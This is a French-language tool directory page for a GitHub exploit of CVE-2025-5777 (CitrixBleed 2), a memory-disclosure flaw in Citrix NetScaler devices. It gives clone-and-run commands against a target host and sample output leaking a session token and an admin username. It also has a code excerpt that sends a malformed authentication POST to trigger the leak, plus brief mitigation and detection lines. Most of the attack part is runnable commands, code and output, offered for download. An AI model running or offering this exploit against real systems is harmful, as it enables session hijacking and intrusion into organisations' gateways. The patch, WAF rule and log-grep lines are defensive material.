Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5777 — Exploit de fuite de mémoire Citrix NetScaler CVE-2025-5777 (CitrixBleed 2) | Kitploit
Outils/GitHubGitHub/bughuntar/cve-2025-5777
Criminalistique MémoireAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubbughuntar/cve-2025-5777

CVE-2025-5777

Exploit de fuite de mémoire Citrix NetScaler CVE-2025-5777 (CitrixBleed 2)

Voir le dépôt
30753il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-5777 - Exploitation de fuite de mémoire Citrix NetScaler

Banner


📌 Aperçu

Cet outil démontre CVE-2025-5777, une vulnérabilité critique de divulgation mémoire dans les appareils Citrix NetScaler ADC/Gateway. L'exploitation divulgue des contenus mémoire sensibles via des requêtes d'authentification malformées.

Fonctionnalités clés :
✔ Détection de fuite mémoire via l'analyse des réponses XML
✔ Vidage Hex+ASCII des régions mémoire divulguées
✔ Format de requête compatible Burp Suite
✔ Requêtes asynchrones pour un test efficace


🔍 Preuve de concept

1. Requête vulnérable (Burp Suite)

Requête Burp

2. Exploitation en action

Exécution de l'outil


⚡ Démarrage rapide

root@kitploit:~
git clone https://github.com/bughuntar/CVE-2025-5777.git
cd CVE-2025-5777
pip install requests beautifulsoup4 aiohttp colorama
chmod +x citrix_memory_leak.py
python3 citrix_memory_leak.py https://target-netscaler.com

Sortie attendue :

root@kitploit:~
+ [+] Memory leak detected!
--- Leaked Memory Hex Dump ---
00000000  73 65 73 73 69 6F 6E 3D 31 32 33 34 35 36 37 38  session=12345678
00000010  55 73 65 72 3A 20 61 64 6D 69 6E 00 00 00 00 00  User: admin.....

🛡️ Atténuation

ActionCommande/Référence
CorrectifBulletin de sécurité Citrix
Règle WAFBlock POST /p/u/doAuthentication.do with malformed params

📚 Ressources

  • Entrée NVD
  • Article technique

🖥️ Points forts du code

root@kitploit:~
# Malformed request trigger
async def exploit(target):
    async with aiohttp.post(
        f"{target}/p/u/doAuthentication.do",
        data="login",  # Missing equals sign triggers leak
        ssl=False
    ) as response:
        await parse_leak(await response.read())

⚠️ Avis juridique

root@kitploit:~
- This tool is for authorized testing ONLY.
- Unauthorized use violates international cybersecurity laws.

Avertissement complet : DISCLAIMER.md

Auteur : Professor the Hunter

Télécharger l’outil
Détectiongrep 'POST /p/u/doAuthentication.do' netscaler.log